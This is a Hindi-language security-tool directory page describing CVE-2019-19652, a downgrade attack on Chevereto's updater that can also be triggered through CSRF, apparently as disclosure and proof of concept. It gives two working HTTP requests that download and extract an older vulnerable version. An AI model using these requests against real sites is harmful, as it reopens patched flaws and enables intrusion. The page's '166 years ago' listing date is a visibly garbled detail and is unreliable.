Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-19652 — Chevereto डाउनग्रेड हमला - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
उपकरण/GitHubGitHub/jra89/cve-2019-19652
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubjra89/cve-2019-19652

CVE-2019-19652

Chevereto डाउनग्रेड हमला - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

रिपॉजिटरी देखें
166 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-19652

Chevereto डाउनग्रेड हमला – 1.0.0–1.1.4 मुफ्त, <= 3.13.5 कोर. एक व्यवस्थापक उपयोगकर्ता अपडेटर स्क्रिप्ट को अपग्रेड के बजाय किसी अन्य संस्करण में डाउनग्रेड करने का निर्देश दे सकता है, जिससे पिछली कमज़ोरियाँ पुनः प्रस्तुत हो जाती हैं। CSRF टोकन की कमी के कारण इस हमले का उपयोग CSRF हमले में भी किया जा सकता है, जिसका अर्थ है कि किसी व्यवस्थापक उपयोगकर्ता को यह कार्य करने के लिए धोखा दिया जा सकता है।

एक व्यवस्थापक उपयोगकर्ता अपडेट स्क्रिप्ट को किसी भी पुराने संस्करण को डाउनलोड करने के लिए कह सकता है

सर्वर डाउनलोड की गई फ़ाइल का पूरा फ़ाइल नाम लौटाएगा, जिसका उपयोग अगले अनुरोध में किया जाएगा

GET /update/?action=download&version=3.13.4 HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1

और फिर इसे वर्तमान संस्करण पर निकालें, जिससे यह पुरानी कमज़ोरियों के प्रति संवेदनशील हो सकता है

GET /update/?action=extract&file=chevereto_3.13.4_3e50e6fa70915cd22849819f.zip HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1
टूल डाउनलोड करें